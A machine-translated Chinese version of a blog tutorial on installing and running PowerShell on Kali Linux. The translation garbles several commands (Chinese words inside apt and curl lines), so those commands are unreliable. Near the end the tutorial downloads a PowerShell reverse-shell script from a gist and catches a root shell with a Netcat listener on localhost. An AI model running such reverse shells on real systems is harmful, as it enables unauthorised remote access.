Installing PowerShell on Kali Linux

2019 年 11 月更新

截至2019 年，这篇文章已过时，因为powershell 已添加到主要存储库中。就做a:

apt update apt -y 安装powershell

您的系统上将安装有powershell。

旧帖子

您可能已经知道可以安全地将外部存储库添加到Kali Linux 安装中，但您可能不知道在线可用的众多存储库之一包括Microsoft 提供的包含PowerShell 的存储库。该存储库适用于Debian，但其软件包在Kali 上安装得很好，正如我们将在这篇文章中展示的那样。

Kali 中的 PowerShell 软件包安装

我们首先安装必要的依赖项，默认情况下，其中大部分应该已经安装在您的Kali 安装中:

apt update apt -y 安装curl gnupg apt-transport-https

接下来，我们需要下载并添加公共存储库GPG 密钥，以便APT 信任这些软件包并提醒您软件包签名的任何问题:

卷曲https://packages.microsoft.com/keys/microsoft.asc | apt-key 添加-

添加GPG 密钥后，我们继续将Microsoft 软件包存储库添加到/etc/apt/sources.list.d/下自己的软件包列表文件中，并更新可用软件包的列表:

echo 'deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod 拉伸主' /etc/apt/sources.list.d/powershell.list

易于更新

最后，我们继续安装powershell包:

apt -y 安装powershell

运行 PowerShell

软件包安装完成后，运行pwsh 将启动PowerShell，向我们呈现熟悉的“PS”提示符:

root@kali:~# pwsh

PowerShell v6.1.0-预览版.2

版权所有(c) Microsoft Corporation。版权所有。

https://aka.ms/pscore6-docs

输入“帮助”以获得帮助。

PS /根

如果您是PowerShell 新手，您可能想做的第一件事就是更新内置帮助，这可以通过运行Update-Help Cmdlet 来完成。这可能需要一些时间才能完成，但实际上只需要偶尔运行一次:

PS /root 更新帮助

更新模块Microsoft.PowerShell.Utility 的帮助

查找帮助内容.

正如您所料，您不会找到在Windows 上使用PowerShell 时习惯的所有命令，但所有核心模块都存在，并且代码正在不断开发和改进:

PS /root Get-Process -Name gnome*

NPM(K) PM(M) WS(M) CPU ID SI 进程名称

------ ----- ----- ------ -- -- ----------

0 0.00 5.71 0.03 1073 072 gnome-keyring-d

0 0.00 9.80 0.19 659 649 gnome-会话-b

0 0.00 13.72 0.36 1089 080 gnome-会话-b

0 0.00 110.06 3.36 778 649 侏儒外壳

0 0.00 277.15 27.85 1170 080 侏儒外壳

0 0.00 11.77 0.09 1199 075 gnome-shell-cal

0 0.00 77.79 4.58 1381 080 gnome 软件

0 0.00 36.58 2.03 1646 646 gnome 终端-

然而，您可以做的令人惊讶的事情之一是使用PowerShell 将反向shell 发送到Netcat 侦听器。我们在网上遇到了一个小型的PowerShell 反向shell，令我们惊讶的是，它很高兴地连接回了我们的监听器:

root@kali:~# pwsh

PowerShell v6.1.0-预览版.2

版权所有(c) Microsoft Corporation。版权所有。

https://aka.ms/pscore6-docs

输入“帮助”以获得帮助。

PS /root wget -q https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1

PS /root ./mini-reverse.ps1

────────────────────────────────────────────────────────────────────────

root@kali:~# nc -lvnp 413

收听[任何] 413 .

从（未知）[127.0.0.1] 59006 连接到[127.0.0.1]

身份证号

uid=0(root) gid=0(root) groups=0(root)

uname -a

Linux kali 4.15.0-kali3-amd64 #1 SMP Debian 4.15.17-1kali1 (2018-04-25) x86_64 GNU/Linux

我们认为值得注意的是，微软不仅开源了PowerShell，而且还不断更新和改进它，并且拥有一个公共软件包存储库，使安装变得轻而易举。